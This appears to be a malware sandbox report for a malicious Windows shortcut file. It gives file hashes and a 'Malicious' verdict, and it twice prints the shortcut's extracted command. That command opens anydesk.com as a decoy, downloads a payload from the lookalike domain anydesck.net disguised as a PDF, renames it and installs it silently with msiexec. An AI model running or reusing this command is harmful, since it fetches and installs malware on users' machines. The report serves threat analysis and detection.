General
Structural Analysis
Config.0
Yara Rules0
Sync
Community
Infection Chain
Summary by MalvaGPT
Characteristics
|
Hash | Hash Value |
|---|---|
| MD5 | ac9af7c8ef463891c55a36e50667cdfb
|
| Sha1 | 34c067d0356bb07bf59cfdb660d583c924a86680
|
| Sha256 | bf90501b49ed366ef57d92c6e49cb36b35772043525ab9351fe5b72fa51d68b6
|
| Sha384 | abde036e10d8fe1f972f7826c7f0adb302645b470ff6cb1340e9507015eee4420d159e2920262f447e5f50454906f5f7
|
| Sha512 | 9cac10e56687f4c7c1427aa82ff9f533095a22b811e2d9a5a61e347de8af4a42f4510f24d55ee25e9dc6821b4252cbeab2c80766d953ef3cdc0c5cecd6cc88e6
|
| SSDeep | 24:8dJfH569JAyx+/5+HyOxA2yn662Ym7ZZG1LZG7lqdd+5Cww9dsquWgncWgssqMmu:8DHTNeyOxAdnnpm72OMdyRw9ducBBZ
|
| TLSH | 2C510F1137EC0768E3B35E3B48769B058977FD86CE258E5D0391998C1866B01E834FBB
|
File Structure
ac9af7c8ef463891c55a36e50667cdfb
Malicious
[Lnk Summary]
Malicious
Artefacts
|
Name0 | Value |
|---|---|
| LNK: Command Execution | cmd.exe cmd.exe /c start msedge "https://anydesk.com" && curl -sLo "%TEMP%\manual.pdf" "https://anydesck.net/download/fhst.pdf" && ren "%TEMP%\manual.pdf" "su35sp.ms" && msiexec /i "%TEMP%\su35sp.ms" /qn" |
ac9af7c8ef463891c55a36e50667cdfb (3.02 KB)
File Structure
ac9af7c8ef463891c55a36e50667cdfb
Malicious
[Lnk Summary]
Malicious
Characteristics
No malware configuration were found at this point.
Artefacts
|
Name0 | Value | Location |
|---|---|---|
| LNK: Command Execution | cmd.exe cmd.exe /c start msedge "https://anydesk.com" && curl -sLo "%TEMP%\manual.pdf" "https://anydesck.net/download/fhst.pdf" && ren "%TEMP%\manual.pdf" "su35sp.ms" && msiexec /i "%TEMP%\su35sp.ms" /qn" Malicious |
ac9af7c8ef463891c55a36e50667cdfb |
You must be signed in to post a comment.
You need a premium account to access this feature.
You must be signed in to post a comment.